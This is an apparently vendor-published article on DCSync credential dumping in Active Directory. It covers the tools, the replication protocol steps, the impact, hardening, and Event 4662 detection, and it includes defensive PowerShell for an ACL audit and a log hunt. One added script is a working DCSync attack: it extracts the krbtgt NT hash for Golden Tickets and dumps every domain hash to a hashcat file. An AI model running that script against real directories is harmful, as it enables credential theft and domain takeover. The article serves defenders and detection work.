How Common are DCSync Attacks?
DCSync is a relatively common form of credential dumping, used both to maintain persistence and to escalate privileges. It has been employed by a range of threat actors, including the LAPSUS$ group and the actors behind the SolarWinds compromise.
DCSync is not a component of every intrusion, but it is commonly used once an attacker has gained control of an Active Directory account with elevated privileges, such as a member of the Administrators, Domain Admins, or Enterprise Admins groups.
In many cases such an attacker already has what they need, making DCSync unnecessary. A more common scenario involves accounts that have been delegated the “Replicating Directory Changes” permissions, which are often granted to applications that integrate with Active Directory. For example, the AD DS Connector account used by Azure AD Connect (Microsoft Entra Connect) holds these rights by design, so an attacker who compromises it can perform a DCSync attack with it.
How Does a DCSync Attack Work?
A DCSync attack can be performed with several tools, including mimikatz (lsadump::dcsync), Impacket’s secretsdump.py, and DSInternals’ Get-ADReplAccount cmdlet. The attacker uses the credentials of an account that holds the directory replication rights to ask a domain controller to replicate directory data, exactly as another DC would. No interactive logon to the DC is required and no code runs on it. The only rights needed are the replication extended rights on the domain naming context (“Replicating Directory Changes” and “Replicating Directory Changes All”); no other read, write, or group-management permissions are involved.
Each tool lets the attacker choose which DC to send the request to, and the request can be sent from any machine on the network that can reach that DC’s RPC interface, including another DC. The goal can be to retrieve the secrets of a single account (for example krbtgt) or to dump the entire Active Directory (AD) database to a file.
The attack process involves the following steps:
- The attacker identifies a domain controller and binds to its Directory Replication Service (DRSUAPI) RPC interface with an IDL_DRSBind call.
- The attacker sends an IDL_DRSGetNCChanges request for the domain naming context, optionally scoped to a single object such as krbtgt.
- The DC checks that the caller holds the replication rights and returns the replication data to the requestor, including the password hashes (NT hash, LM hash where present, Kerberos keys, and password history) it would normally send only to another DC.
The attack requires the following rights on the domain naming context:
- Replicating Directory Changes (DS-Replication-Get-Changes)
- Replicating Directory Changes All (DS-Replication-Get-Changes-All); this second right is what causes the DC to include secret attributes such as password hashes. Without it the DC still answers, but omits them.
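The exchange above, driven from PowerShell with the DSInternals Get-ADReplAccount cmdlet that the article names. This is an added example and not code from the original article or from the DSInternals project; the domain corp.example, the DC dc01.corp.example, and the account CORP\svc-sync (assumed to hold both replication rights) are assumptions.

```powershell
# Added example: one DCSync request for a single account, then a full dump.
# Requires: Install-Module DSInternals (and network reach to the DC's RPC interface).
Import-Module DSInternals

$dc   = 'dc01.corp.example'                       # the DC that will answer IDL_DRSGetNCChanges
$cred = Get-Credential -UserName 'CORP\svc-sync' -Message 'Account holding replication rights'

# Step 1-2: bind to the DC's DRSUAPI interface and request one object (krbtgt).
# No logon to the DC takes place; only the replication rights are checked.
$krbtgt = Get-ADReplAccount -SamAccountName 'krbtgt' -Domain 'corp' -Server $dc -Credential $cred

# Step 3: the reply carries the secret attributes a DC would replicate.
$krbtgt | Select-Object SamAccountName, DistinguishedName, PasswordLastSet
$ntHash = ($krbtgt.NTHash | ForEach-Object { $_.ToString('x2') }) -join ''
"krbtgt NT hash: $ntHash"                          # this hash is all a Golden Ticket needs

# Same request for the whole naming context, written out in hashcat's NT format.
Get-ADReplAccount -All -Server $dc -Credential $cred |
    Format-Custom -View HashcatNT |
    Out-File -FilePath '.\corp-nt-hashes.txt' -Encoding ascii
```

Both calls produce the same Event ID 4662 on the DC as legitimate replication would; the only thing that distinguishes them is the subject account, which is the basis of the detection described later in this article.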
Impact of a DCSync Attack
A DCSync attack has a significant impact on a network’s security. Once an attacker holds the replicated AD data, they can use it to launch further attacks without ever obtaining clear-text passwords: pass-the-hash, overpass-the-hash (using an NT hash to obtain Kerberos tickets), and pass-the-ticket, which give access to sensitive applications and can be used to pivot into cloud services that are federated with or synchronized from the domain.
Additionally, cracked password hashes can reveal patterns or default passwords that are reused elsewhere, further compromising security. Moreover, if any accounts are configured to store passwords using reversible encryption, a DCSync attack returns those passwords in clear text, granting immediate authentication and posing a serious risk.
Furthermore, because the dump includes the krbtgt account’s hash, a Golden Ticket attack can be launched, which allows the attacker to forge Kerberos tickets and authenticate as any account in the AD, posing a high risk of unauthorized access and potential security breaches.
How to Protect AD Against DCSync Attacks
To effectively defend against DCSync attacks, it is essential to properly protect accounts with elevated permissions. This involves scrutinizing account membership in the Administrators, Domain Admins, and Enterprise Admins groups, and ensuring that only dedicated admin accounts with strong passwords and account protections (for example, membership in Protected Users and no use on workstations) remain in them. Additionally, identify and protect every account or group granted “Replicating Directory Changes” and “Replicating Directory Changes All” on the domain root, including service accounts such as the Azure AD Connect connector account, and review who can modify the domain root’s ACL, since anyone who can write its DACL can grant themselves those rights.
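A way to carry out that review, as an added example that is not part of the original article: enumerate every ACE on the domain root that either grants a replication right directly or would let its holder grant one. It assumes the ActiveDirectory RSAT module in a domain-joined session; the list of principals treated as expected reflects a default domain and is an assumption to adjust locally.

```powershell
# Added example: who can DCSync this domain, and who could make themselves able to.
Import-Module ActiveDirectory

$domain   = Get-ADDomain
$domainDn = $domain.DistinguishedName
$adr      = [System.DirectoryServices.ActiveDirectoryRights]

# Extended-right GUIDs that authorise replication of the naming context
$replRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
# Principals that hold these rights in a default domain (assumption; verify for your forest)
$expected = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    "$($domain.NetBIOSName)\Domain Controllers",
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    "$($domain.NetBIOSName)\Enterprise Read-only Domain Controllers"
)

$acl = Get-Acl -Path "AD:\$domainDn"
$findings = foreach ($ace in $acl.Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    $guid   = $ace.ObjectType.ToString()
    $rights = [int]$ace.ActiveDirectoryRights
    $reason = $null
    if ($replRights.ContainsKey($guid)) {
        $reason = $replRights[$guid]
    } elseif (($rights -band [int]$adr::ExtendedRight) -ne 0 -and $guid -eq [guid]::Empty.ToString()) {
        # An ExtendedRight ACE with an empty ObjectType grants every extended right
        $reason = 'All extended rights (includes replication)'
    } elseif (($rights -band ([int]$adr::GenericAll -bor [int]$adr::WriteDacl -bor [int]$adr::WriteOwner)) -ne 0) {
        # Not a replication right, but enough to grant one to oneself
        $reason = "Can grant replication rights ($($ace.ActiveDirectoryRights))"
    }
    if ($reason) {
        [pscustomobject]@{
            Principal = $ace.IdentityReference.Value
            Right     = $reason
            Expected  = $expected -contains $ace.IdentityReference.Value
        }
    }
}

$findings | Sort-Object Expected, Principal | Format-Table -AutoSize
```

Every row with Expected set to False is an account that can DCSync the domain (or make itself able to) and needs the same protection as a Domain Admin; integration accounts such as the Azure AD Connect connector account will appear here and should be treated accordingly rather than removed.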
Protecting Domain Controllers
Protecting domain controllers (DCs) from DCSync attacks is crucial. This includes enforcing NTLMv2 (or disabling NTLM where possible), applying monthly security patches, running the most up-to-date operating system, and monitoring for logons to DCs by regular user accounts. It is important to note that a compromised DC can be used to DCSync another: its replication requests are legitimate by design and come from a DC IP address, so detections that only look for non-DC sources will not see them.
Detecting DCSync Attacks
To detect DCSync attacks, monitor network traffic for replication requests originating from a non-DC IP address. Look for traffic on the DRSUAPI RPC interface carrying DsGetNCChanges (IDL_DRSGetNCChanges) operations. On the DCs, check the Security log for Event ID 4662, which records an access check on a directory object; for it to be generated, the Audit Directory Service Access subcategory must log successes and the domain root’s SACL must audit the replication rights. Filter on the GUIDs in the event’s Properties field for DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2), DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) and, to be thorough, DS-Replication-Get-Changes-In-Filtered-Set (89e95b76-444d-4c62-991a-0facbeda640c), and exclude requests whose subject is a DC computer account. The remaining events identify the requesting account and the object replicated; because 4662 carries no source address, join its SubjectLogonId to the matching 4624 logon event to obtain the source IP.
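The 4662 hunt described above as a script, added here as an example that is not part of the original article. It assumes the ActiveDirectory RSAT module, that Audit Directory Service Access (Success) is enabled on the DCs, that the session can read each DC’s Security log remotely, and a 24-hour lookback, which is an arbitrary choice.

```powershell
# Added example: find 4662 replication accesses on every DC that did not come from a DC.
Import-Module ActiveDirectory

$lookback        = (Get-Date).AddHours(-24)                 # assumption: adjust to your retention
$replGuidPattern = '1131f6a[ad]-9c07-11d1-f79f-00c04fc2dcd2|89e95b76-444d-4c62-991a-0facbeda640c'

$dcs = Get-ADDomainController -Filter *
# DC-to-DC replication is expected and is filtered out by the requesting machine account.
# A compromised DC would pass this filter, which is why the DC hardening above still matters.
$dcAccounts = $dcs | ForEach-Object { "$($_.Name)`$" }

$hits = foreach ($dc in $dcs) {
    $events = Get-WinEvent -ComputerName $dc.HostName -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName = 'Security'; Id = 4662; StartTime = $lookback
    }
    foreach ($e in $events) {
        # Pull the named EventData fields out of the event XML
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        if ($d['Properties'] -notmatch $replGuidPattern) { continue }   # not a replication right
        if ($dcAccounts -contains $d['SubjectUserName']) { continue }   # normal DC replication

        $rights = [regex]::Matches($d['Properties'], $replGuidPattern) |
                      ForEach-Object { $_.Value } | Sort-Object -Unique
        [pscustomobject]@{
            TimeCreated = $e.TimeCreated
            DC          = $dc.Name
            Subject     = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            LogonId     = $d['SubjectLogonId']      # join to 4624 TargetLogonId for the source IP
            Object      = $d['ObjectName']          # naming context or object the check was made on
            Rights      = $rights -join ','
        }
    }
}

$hits | Sort-Object TimeCreated | Format-Table -AutoSize
```

Any row whose subject is not a known integration account (such as the Azure AD Connect connector account) is a DCSync candidate and should be escalated; even for known accounts, a request from a logon session on an unexpected host is worth a look, which is what the LogonId to 4624 join provides.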
How Lepide Helps Detect DCSync Attacks
The Lepide Data Security Platform can help to detect and respond to DCSync attacks through its advanced detection capabilities. The platform will monitor domain replication traffic for suspicious activity, allowing it to identify patterns of behavior indicative of a DCSync attack. By analyzing replication traffic between domain controllers and non-domain controllers, Lepide’s solution can detect and alert on DCSync attacks, providing critical information such as the perpetrator’s identity, the targeted domain and user, and supporting evidence. This comprehensive approach enables fast and effective response to DCSync attacks, including blocking privilege escalation to prevent attackers from escalating their access and exploiting further.